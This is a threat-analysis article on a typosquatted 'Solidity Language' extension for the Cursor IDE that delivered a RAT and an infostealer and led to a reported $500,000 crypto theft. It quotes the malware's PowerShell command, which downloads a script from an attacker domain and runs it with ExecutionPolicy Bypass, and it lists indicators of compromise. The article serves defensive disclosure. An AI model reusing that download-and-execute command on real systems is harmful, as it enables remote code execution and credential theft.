Malicious VSCode Extension in Cursor IDE: $500K Crypto Theft Analysis

A sophisticated attack involving a malicious VSCode extension in the Cursor AI IDE resulted in the theft of $500,000 in cryptocurrency from a Russian developer. The fake extension, masquerading as a Solidity syntax highlighter, delivered remote access tools and information stealers to compromised systems. This incident highlights growing concerns about supply chain attacks targeting developer tools.

Attack Vector and Technical Details

The malicious extension named “Solidity Language” was uploaded to the Open VSX registry, posing as a legitimate tool for Ethereum smart contract development. Researchers from Kaspersky and BleepingComputer identified it as a typosquatting attempt against the legitimate “juanblanco/solidity” extension, with subtle character substitutions in the publisher name^1,2. The extension contained a PowerShell script that downloaded additional payloads from the domain angelic[.]su, including ScreenConnect RAT and PureLogs stealer malware.

The attack chain began when developers installed the extension, which then executed the following PowerShell command:

Invoke-WebRequest -Uri "http://angelic[.]su/1.txt" -OutFile "$env:TEMP\payload.ps1"; 
Start-Process powershell -ArgumentList "-ExecutionPolicy Bypass -File $env:TEMP\payload.ps1"

Security analysts discovered the malware used advanced evasion techniques, including embedding the VMDetector loader within a PNG file hosted on archive[.]org. This loader employed XOR encryption to conceal its command-and-control infrastructure, which resolved to relay.lmfao[.]su².

Impact and Campaign Statistics

The malicious extension reportedly achieved 54,000 downloads before being removed, though researchers suspect many were artificially inflated by bots. A subsequent clone named “solidity” appeared with over 2 million claimed downloads, demonstrating the attackers’ persistence¹. The primary victim, a Russian cryptocurrency developer, lost $500,000 when attackers gained access to their wallet credentials through the installed information stealer.

Kaspersky’s analysis linked the attack to known patterns from the Dark Partners cybercrime group, which has been associated with previous cryptocurrency theft campaigns². The malware specifically targeted:

Browser-stored cryptocurrency wallet credentials
Two-factor authentication tokens
Development environment configuration files

Detection and Mitigation

Security teams should monitor for connections to the identified IoCs and review installed extensions in developer environments. Kaspersky recommends verifying extension publishers and using tools like their Open-Source Feed to identify potentially malicious packages². The following indicators were associated with this campaign:

Type	Indicator
Domains	angelic[.]su, lmfao[.]su, staketree[.]net
Payloads	1.txt, 2.txt (PowerShell scripts)
File Hash	2c471e265409763024cdc33579c84d88d5aaf9aea1911266b875d3b7604a0eeb

Broader Implications for Developer Tools

This incident follows a pattern of increasing attacks against software development infrastructure. The Open VSX registry, like npm and other package repositories, has become a prime target due to the high level of trust developers place in these ecosystems. AI-powered IDEs like Cursor present particularly attractive targets as they often handle sensitive credentials and intellectual property¹.

Kaspersky’s 2025 SMB Threat Report notes a 50% increase in attacks targeting collaboration and development tools over the past year². This trend suggests that organizations need to implement stricter controls around development environment security, including:

Restricting extension installation to vetted sources
Monitoring for unusual network activity from development systems
Implementing separate environments for development and cryptocurrency operations

The $500,000 cryptocurrency theft demonstrates the real-world consequences of these supply chain attacks. As development tools become more complex and interconnected, security teams must adapt their monitoring and protection strategies to address these emerging threats.